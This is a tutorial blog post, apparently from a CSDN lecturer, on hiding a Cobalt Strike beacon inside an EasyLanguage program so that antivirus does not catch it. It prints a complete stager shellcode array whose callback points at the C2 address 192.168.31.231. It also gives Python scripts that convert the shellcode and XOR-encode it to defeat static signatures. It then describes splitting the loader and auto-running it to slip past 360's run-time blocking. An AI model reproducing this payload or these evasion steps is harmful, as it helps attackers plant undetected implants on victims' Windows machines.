A lot of people complain that programs written in EasyLanguage (易语言) are always flagged by antivirus.
So today we will use EasyLanguage as the example and walk through AV evasion (免杀) for an EasyLanguage program.
First, set up a Cobalt Strike (CS) team server on the internal lab network using Kali, then use CS to generate a payload in the C format.
Because the output is C-style shellcode (a string of hex escapes), it cannot be handed to EasyLanguage as-is.
EasyLanguage's code layer only accepts machine code written as a decimal byte-set literal, so the hex shellcode has to be converted to a comma-separated list of decimal values before EasyLanguage can use it.
A small converter is written for that (the converter itself is not shown here); its output is the decimal array below:
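The converter the post refers to is not reproduced on the page, so the following is an added Python example, not the author's program. It parses the "C" export of Cobalt Strike's payload generator (the `"\xfc\xe8..."` string form, and, going slightly beyond the post, the `0xfc, 0xe8, ...` array form too), cross-checks the byte count against the `length: N bytes` comment CS writes so a truncated paste is caught, and prints the `{d,d,d,...}` byte-set literal that EasyLanguage expects. The embedded sample is a constructed 24-byte prefix of the stager shown on this page, not the full payload.

```python
import re
import sys

# Constructed sample in the "C" format Cobalt Strike's payload generator exports;
# these are only the first 24 bytes of the x86 stager on this page, not the whole payload.
SAMPLE_C_PAYLOAD = r'''
/* length: 24 bytes */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28";
'''

# Accepts both the C-string form ("\xfc\xe8...") and the array form (0xfc, 0xe8, ...)
BYTE_LITERAL = re.compile(r'\\x([0-9a-fA-F]{2})|0x([0-9a-fA-F]{2})')
LENGTH_COMMENT = re.compile(r'length:\s*(\d+)\s*bytes')


def c_shellcode_to_bytes(text: str) -> bytes:
    """Extract every byte literal from the exported payload, in order."""
    sc = bytes(int(m.group(1) or m.group(2), 16) for m in BYTE_LITERAL.finditer(text))
    # If the export carries CS's "length: N bytes" comment, use it as a sanity check
    # so a truncated copy-paste is noticed before it is pasted into the loader.
    m = LENGTH_COMMENT.search(text)
    if m and int(m.group(1)) != len(sc):
        raise ValueError(f"expected {m.group(1)} bytes, parsed {len(sc)}")
    return sc


def to_easylanguage_array(sc: bytes, per_line: int = 20) -> str:
    """Render as the {d,d,d,...} decimal byte-set literal the post pastes into EasyLanguage."""
    nums = [str(b) for b in sc]
    rows = [",".join(nums[i:i + per_line]) for i in range(0, len(nums), per_line)]
    return "{" + ",\n".join(rows) + "}"


def from_easylanguage_array(literal: str) -> bytes:
    """Inverse of to_easylanguage_array, used to confirm the round trip."""
    inner = literal.strip().strip("{}").replace("\n", "")
    return bytes(int(n) for n in inner.split(",") if n)


if __name__ == "__main__":
    # Usage: python convert.py payload.c   (falls back to the embedded sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_C_PAYLOAD
    sc = c_shellcode_to_bytes(text)
    literal = to_easylanguage_array(sc)
    assert from_easylanguage_array(literal) == sc
    print(f"{len(sc)} bytes")
    print(literal)
```

Running it on the sample prints `24 bytes` followed by `{252,232,137,0,0,0,96,...}`, the same opening values as the array below. The length check matters more than it looks: a stager that loses its last few bytes in a paste will still "load" but crash or silently fail to call back, which is easy to misread as the AV having caught it.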
{252,232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20,139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207,13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192,116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1,214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125,36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4,139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18,235,134,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,255,213,49,255,87,87,87,87,87,104,58,86,121,167,255,213,233,132,0,0,0,91,49,201,81,81,106,3,81,81,104,80,0,0,0,83,80,104,87,137,159,198,255,213,235,112,91,49,210,82,104,0,2,64,132,82,82,82,83,82,80,104,235,85,46,59,255,213,137,198,131,195,80,49,255,87,87,106,255,83,86,104,45,6,24,123,255,213,133,192,15,132,195,1,0,0,49,255,133,246,116,4,137,249,235,9,104,170,197,226,93,255,213,137,193,104,69,33,94,49,255,213,49,255,87,106,7,81,86,80,104,183,87,224,11,255,213,191,0,47,0,0,57,199,116,183,49,255,233,145,1,0,0,233,201,1,0,0,232,139,255,255,255,47,73,98,90,87,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77,83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,48,59,32,87,79,87,54,52,59,32,84,114,105,100,101,110,116,47,53,46,48,59,32,109,115,110,32,79,112,116,105,109,105,122,101,100,73,69,56,59,69,78,85,83,41,13,10,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,76,69,33,36,72,43,72,42,0,53,79,33,80,37,64,65,80,91,52,92,80,90,88,53,52,40,80,94,41,55,67,67,41,55,125,36,69,73,67,65,82,45,83,84,65,78,68,65,82,68,45,65,78,84,73,86,73,82,85,83,45,84,69,83,84,45,70,73,0,104,240,181,162,86,255,213,106,64,104,0,16,0,0,104,0,0,64,0,87,104,88,164,83,229,255,213,147,185,0,0,0,0,1,217,81,83,137,231,87,104,0,32,0,0,83,86,104,18,150,137,226,255,213,133,192,116,198,139,7,1,195,133,192,117,229,88,195,232,169,253,255,255,49,57,50,46,49,54,56,46,51,49,46,50,51,49,0,0,0,0,0}
Then try loading this shellcode: it loads, and the beacon checks in.
Next the compiled program is copied to the target machine (Windows 10). On landing, that is, under a purely static scan, it is not caught.
The moment it is executed, though, it gets blocked. This build starts a thread that loads the shellcode as soon as the window has finished being created, so it is the loading behaviour at run time, not the file on disk, that the AV is reacting to.
Another reason is that the shellcode is still plaintext, so its signature is far too obvious: decode the ASCII bytes in the array above and you can read the stager's User-Agent header, the C2 address 192.168.31.231, and several copies of the EICAR test string, which the Cobalt Strike trial is known to embed in its payloads as a tell. Any scanner will flag that on sight, whatever wrapper it sits in.
One more point: 360, which is notoriously trigger-happy, has signatured EasyLanguage-compiled programs wholesale.
So my personal suggestion is to turn on EasyLanguage's built-in junk-instruction (花指令) option, which gives the binary some degree of obfuscation.
With that done, the next step is to obfuscate the shellcode itself and break up the code that loads it.
Then put the newly compiled program on the target machine and run it again.
It runs. Trigger the shellcode load: it loads successfully and nothing is blocked.
So against this AV, simply splitting the code up, with the loading step behind a separate button handler instead of on the start-up path, is enough to get past the detection. Keep in mind this only says something about this product at the time of testing; a behavioural detection of the load itself would not care how the code is split.
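The post says the shellcode was obfuscated but does not show how. The following is an added Python example, not the author's code, of the build-time half of one common approach: repeating-key XOR over the decimal array, emitting the encoded bytes and the key as separate EasyLanguage byte-set literals. `printable_strings` reproduces what the `strings` tool reports, so you can see the C2 address and User-Agent (the plaintext noted above) disappear, and it also shows the caveat that a single-byte key leaves printable text printable. The sample bytes are constructed: a few opcodes from the array on this page plus the kind of strings a CS HTTP stager carries, not the full payload.

```python
import os
import re

# Constructed stand-in for the stager: a few opcode bytes from the array above, then
# the kind of plaintext a CS HTTP stager carries (User-Agent header, C2 address as read
# out of the decoded array). Not the full payload.
SAMPLE_SHELLCODE = (
    bytes([252, 232, 137, 0, 0, 0, 96, 137, 229, 49, 210, 100, 139, 82, 48])
    + b"\x00User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64)\r\n\x00"
    + b"192.168.31.231\x00"
)


def xor_encode(sc: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Applying it a second time with the same key decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(sc))


def printable_strings(data: bytes, min_len: int = 6) -> list:
    """What the `strings` tool would report: runs of printable ASCII of min_len or more."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def to_easylanguage_array(sc: bytes) -> str:
    """The {d,d,d,...} decimal byte-set literal EasyLanguage accepts."""
    return "{" + ",".join(str(b) for b in sc) + "}"


def build(sc: bytes, key: bytes = b"") -> tuple:
    """Encode once at build time; returns (key, encoded) so the two can be pasted
    into different parts of the loader rather than sitting next to each other."""
    key = key or os.urandom(16)          # fresh multi-byte key per build
    enc = xor_encode(sc, key)
    assert xor_encode(enc, key) == sc    # the run-time decode loop must give this back
    return key, enc


if __name__ == "__main__":
    print("before      :", printable_strings(SAMPLE_SHELLCODE))
    # A 1-byte key maps printable ASCII onto printable ASCII, so `strings` still sees text.
    print("1-byte key  :", printable_strings(xor_encode(SAMPLE_SHELLCODE, b"\x01")))
    key, enc = build(SAMPLE_SHELLCODE)
    print("16-byte key :", printable_strings(enc))
    print("key   =", to_easylanguage_array(key))
    print("bytes =", to_easylanguage_array(enc))
```

On the EasyLanguage side the run-time half is the mirror image: walk the encoded byte set, XOR each byte with `key[i mod len(key)]`, and only then hand the result to whatever allocate-and-run path the loader already uses. Keeping the key literal well away from the data literal is the same "split the code" idea as above. Note what this does and does not buy: the plaintext strings and the raw stager bytes are gone from the file, so the static signature is gone, but the memory that is decoded and executed at run time looks exactly as it did before, which is where the first build got blocked.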
Now make it run on its own, so the shellcode is loaded as soon as the program starts.
Done: the shellcode now loads automatically.
Let me explain why I change the window title and then check the title before calling the button handler.
If I tested a fixed value and then called the button handler, the condition would be a constant, and the compiler would optimize that block away, i.e. delete it outright. Testing a value that only exists at run time (the title just set on the window) is what keeps it from being optimized out.
Of course, this is only a very basic technique.
If you want better results and you are using CS, I would suggest learning how to do secondary development (二改) on CS itself.
I am a lecturer on CSDN and will start recording videos over the next few days. If you found this useful, please follow my lecturer page, much appreciated: https://edu.csdn.net/lecturer/6606
QQ tech discussion group: 389391578